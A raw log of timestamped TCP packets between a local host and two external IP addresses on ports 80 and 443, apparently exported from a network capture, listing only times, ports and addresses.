Aug 23, 2022 03:42:53.714243889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714255095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714287043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714298010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714325905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714340925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714366913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714380980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714410067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714421034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714449883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714466095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714500904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714502096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714541912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.714560986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.714601994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733493090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733520985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733582973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733599901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733604908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733628035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733633041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733642101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733701944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733724117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733746052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733746052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733755112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733763933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733769894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.733788013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.733830929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.734051943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.734075069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.734119892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.734141111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.734144926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.734164953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.734188080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.734201908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.734210968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.734249115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.734263897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738147020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738178968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738257885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738271952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738277912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738336086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738399982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738429070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738457918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738465071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738495111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738533974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738542080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738574028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738603115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738619089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738634109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738651037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738718987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738779068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738780975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738832951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738837957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738868952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738892078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738898993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.738928080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738945961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.738957882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739010096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.739248991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739315987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739336967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.739360094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739383936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.739402056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739433050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739433050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.739461899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.739473104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.739487886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.739520073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740641117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740673065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740700006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740727901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740730047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740751982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740756989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740786076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740796089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740813971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740839005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740849018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740855932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740875006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740907907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740932941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740935087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.740956068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740989923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.740993023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741024971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741050005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741080999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741277933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741308928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741328955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741364956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741496086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741509914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741552114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741555929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741588116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741616011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741655111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741750956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741780043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741811037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741826057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.741833925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.741893053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.742223978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.742253065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.742305040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.742309093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.742324114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.742335081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.742363930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.742364883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.742389917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.742423058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.742428064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.742490053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.749157906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.749257088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.765883923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.765969038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766005039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766015053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766036987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766042948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766074896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766083956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766091108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766100883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766124964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766141891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766149044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766156912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766172886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766180992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766195059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766201019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766220093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766228914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766244888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766246080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766268015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766309977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766324997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766367912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766380072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766391993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.766423941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.766437054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770320892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770369053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770416021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770423889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770442009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770476103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770484924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770517111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770531893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770556927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770569086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770596981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770610094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770634890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770668983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770674944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.770690918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.770729065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777110100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777154922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777195930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777216911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777234077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777235985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777244091 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777276993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777317047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777318954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777340889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777358055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777374983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777399063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777412891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777441025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777453899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777492046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777503014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777544975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777558088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777585983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777599096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777640104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777693987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777734041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777751923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777772903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.777786970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.777827978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.778611898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.778655052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.778695107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.778693914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.778711081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.778736115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.778750896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.778776884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.778789997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.778819084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.778831959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.778868914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779114008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779158115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779181004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779196978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779217005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779238939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779258013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779279947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779320955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779325008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779339075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779381037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779414892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779458046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779479027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779495955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779522896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779536009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779547930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779576063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779591084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779618025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779625893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779659986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779669046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779700041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779712915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779741049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779755116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779782057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779798031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779822111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779839993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779861927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779877901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779906988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779916048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779948950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.779963970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.779993057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.780004978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.780031919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.780047894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.780086040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.784392118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.784518957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.784881115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.784894943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798079967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798140049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798182964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798223019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798261881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798301935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798325062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798358917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798360109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798366070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798373938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798382044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798388004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798398972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798439026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798476934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798481941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798502922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798537016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798567057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798578978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798583031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798620939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798621893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798664093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798679113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798692942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798700094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:53.798729897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.798966885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:53.969577074 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.969618082 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:53.969866991 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.970551014 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:53.970570087 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.046411037 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.046505928 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:54.049005032 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:54.049021959 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.051276922 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:54.051290035 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.095432043 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.095550060 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.095645905 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:54.095674038 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:54.115741014 CEST	49797	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:54.115762949 CEST	443	49797	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:54.354197025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.388087034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.476864100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.476917982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.476962090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.476984978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477003098 CEST	80	49774	45.95.11.158	192.168.2.3
